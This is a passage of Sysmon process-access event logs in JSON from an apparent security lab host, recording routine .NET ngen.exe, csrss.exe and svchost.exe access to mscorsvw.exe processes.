{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.136\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00103BA90D00}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.136","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00103BA90D00}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.136\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00103BA90D00}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.136","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00103BA90D00}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.152\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00103BA90D00}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.152","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00103BA90D00}","TargetProcessId":"2744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.199\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.199","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.199\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.199","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00101D990C00}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00101D990C00}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.230\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.230","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010C8B00D00}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.230\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010C8B00D00}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 